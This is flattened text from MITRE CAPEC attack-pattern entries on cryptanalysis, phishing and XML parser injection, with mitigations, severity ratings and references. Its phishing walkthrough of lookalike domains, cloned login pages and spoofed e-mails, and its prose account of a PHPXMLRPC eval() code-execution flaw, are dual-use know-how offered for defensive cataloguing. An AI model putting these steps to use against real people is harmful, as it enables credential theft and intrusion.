Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required.
Use proven cryptographic algorithms with recommended key sizes.
Ensure that the algorithms are used properly. That means:
1. Not rolling out your own crypto; Use proven algorithms and implementations.
2. Choosing initialization vectors with sufficiently random numbers
3. Generating key material using good sources of randomness and avoiding known weak keys
4. Using proven protocols and their implementations.
5. Picking the most appropriate cryptographic algorithm for your usage context and data
Confidentiality
Read application data
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
327
Targeted
693
Targeted
719
Targeted
1000
Attack Pattern
ChildOf
CanPrecede
20
1000
Category
ChildOf
281
Reconnaissance
High
High
Low
All
All
All
All
Wikipedia
Cryptanalysis
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Cryptanalysis
CAPEC Content Team
The MITRE Corporation
2014-06-23
Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or "fishing" for information.
Obtain domain name and certificate to spoof legitimate site
This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.
Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
env-Web
Optionally obtain a legitimate SSL certificate for the new domain name.
env-Web
Websites can acquire many domain names that are similar to their own. For example, the company example.com should be sure to register example.net, .org, .biz, .info and so on. Likewise they should register exarnple.com, examp1e.com, exampIe.com (and possibly .net, .org variations). Although this does not preclude the possibility of phishing, it makes the attackers' job harder because all the easily believable names are taken.
Explore legitimate website and create duplicate
An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that he or she is trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.
Use spidering software to get copy of web pages on legitimate site.
env-Web
Manually save copies of required web pages from legitimate site.
env-Web
Create new web pages that have the legitimate site's look at feel, but contain completely new content.
env-Web
Convince user to enter sensitive information on attacker's site.
An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.
Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
env-Web
Place phishing link in post to online forum.
env-Web
Legitimate user clicks on link supplied by attacker and enters the requested information.
Legitimate user realizes that the e-mail is not legitimate, or that the attackers' website is not legitimate, and therefore, does not enter the information requested by the attacker.
Monitor server logs for referrers. Phishing websites frequently include links to "terms and conditions" "privacy" and other standard links on the legitimate site. Users' web browsers will generally reveal the phishing site in the Referrer header. Since the URL may not visually stand out compared to the legitimate URL, some programmatic consolidation of referrers from log files may be required to ensure that example.com stands out from examp1e.com, for example.
Use stolen credentials to log into legitimate site
Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.
Log in to the legitimate site using another user's supplied credentials
env-Web
Use a human verifiable shared secret between legitimate site and end user such as the one provided by PassMark Security (now part of RSA Security). This prevents the attacker from using stolen credentials. Note that this does not protect against some man-in-the-middle attacks where an attacker establishes a session with the legitimate site and convinces an end user to establish a session with him. The attacker then records and forwards information flowing between the end user and the trusted site. This security control is currently used by many online banking websites including Bank of America's website.
Use an out-of-band user authentication mechanism before allowing particular computers to "register" to use the legitimate site with particular login credentials. This also prevents the attacker from using stolen credentials. An example may be sending a SMS message to the user's cell phone (cell phone number previously acquired by site) with an "activation code" every time the user attempts to log into the site from a new computer. This solution also does not protect against the man-in-the-middle attack described in the previous security control. This mechanism is currently used by several online banking websites including JP Morgan Chase's website.
An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.
An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their "hooks" to many potential victims.
An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.
The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity.
Very High
High
Social Engineering
Spoofing
John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attackers' choice.
Medium
Some web development tools to put up a fake website.
You receive an e-mail from an entity that you are not even a customer of prompting you to log into your account.
You receive any e-mail that provides you with a link which takes you to a website on which you need to enter your log in information.
Making the link in the e-mail and the actual website look very legitimate.
Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
Integrity
Modify application data
1000
Attack Pattern
ChildOf
151
Reconnaissance
High
High
Low
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. These adverse effects may include the parser crashing, consuming too much of a resource, executing too slowly, executing code supplied by an attacker, allowing usage of unintended system functionality, etc. An attacker's goal is to leverage parser failure to his or her advantage. In some cases it may be possible to jump from the data plane to the control plane via bad data being passed to an XML parser. [R.99.1]
An attacker determines the input data stream that is being processed by an XML parser on the server side.
An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the server.
An application uses an XML parser to perform transformation on user-controllable data.
An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser.
Medium
Medium
Injection
API Abuse
"PHPXMLRPC aka XML-RPC For PHP is a PHP implementation of the XML-RPC web RPC protocol, and was originally developed by Edd Dumbill of Useful Information Company. As of the 1.0 stable release, the project has been opened to wider involvement and moved to SourceForge. PHPXMLRPC is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, and TikiWiki. Unfortunately PHPXMLRPC is vulnerable to a remote php code execution vulnerability that may be exploited by an attacker to compromise a vulnerable system.
Remote Command Execution:
PHPXMLRPC is vulnerable to a very high risk remote php code execution vulnerability that may allow for an attacker to compromise a vulnerable webserver. The vulnerability is the result of unsanitized data being passed directly into an eval() call in the parseRequest() function of the XMLRPC server.
By creating an XML file that uses single quotes to escape into the eval() call an attacker can easily execute php code on the target server. This has a lot to do with the fact that magic_quotes_gpc() does not apply to $HTTP_RAW_POST_DATA so using single quotes is not a problem" [R.99.2]
CVE-2005-2498
Low
Denial of service (making the parser crash)
High
Arbitrary code execution
Bad data is continuously passed to the XML parser, possibly making it crash.
Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.
Perform validation on canonical data.
Pick a robust implementation of an XML parser.
Validate XML against a valid schema or DTD prior to parsing.
Availability
DoS: resource consumption (memory)
Denial of Service
Confidentiality
Read memory
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Application XML-compliant interface
User-controllable XML code
The XML parser code.
112
Targeted
20
Targeted
19
Targeted
674
Targeted
770
Targeted
1000
Attack Pattern
ChildOf
82
Penetration
Exploitation
Medium
High
High
Client-Server
SOA
All
All
All
Shlomo, Yona
XML Parser Attacks: A summary of ways to attack an XML Parser
What is an XML Parser Attack?
2007
http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html
GulfTech Security Research
PHPXMLRPC Remote Code Execution
BugTraq Archive
June 29, 2005
http://www.securityfocus.com/archive/1/403987
CAPEC Content Team
The MITRE Corporation
2014-06-23
All
All environments are applicable
Client-Server
An environment using distinct client and server software. The client is typically, but not always, native binaries on a standard platform. The server can be any technology at all, independent of the client.
Communication Protocol
A communication protocol. The protocol could be a unicast protocol such as Kerberos, a multicast protocol such as IPTV, or a broadcast protocol such as parts of DHCP. Also, the protocol may exist at any of the seven OSI layers.
Embedded Devices
The environment on embedded devices is characterized by limited memory and processing power. They generally have minimal security controls because of their environmental constraints, and often rely on bigger systems to provide security controls.
Local Environment
The local environment of the host that the attacker has access to. The attacker may or may not have physical access to the host, but does have the privileges to execute commands on the host.
Peer-To-Peer Environment
A peer-to-peer environment is one that does not have the concept of separate clients and servers; all nodes are equal peers that simultaneously function as both clients and servers.
Web Environment
A traditional web environment involving HTTP clients and servers and HTTP 1.0 or 1.1 protocol.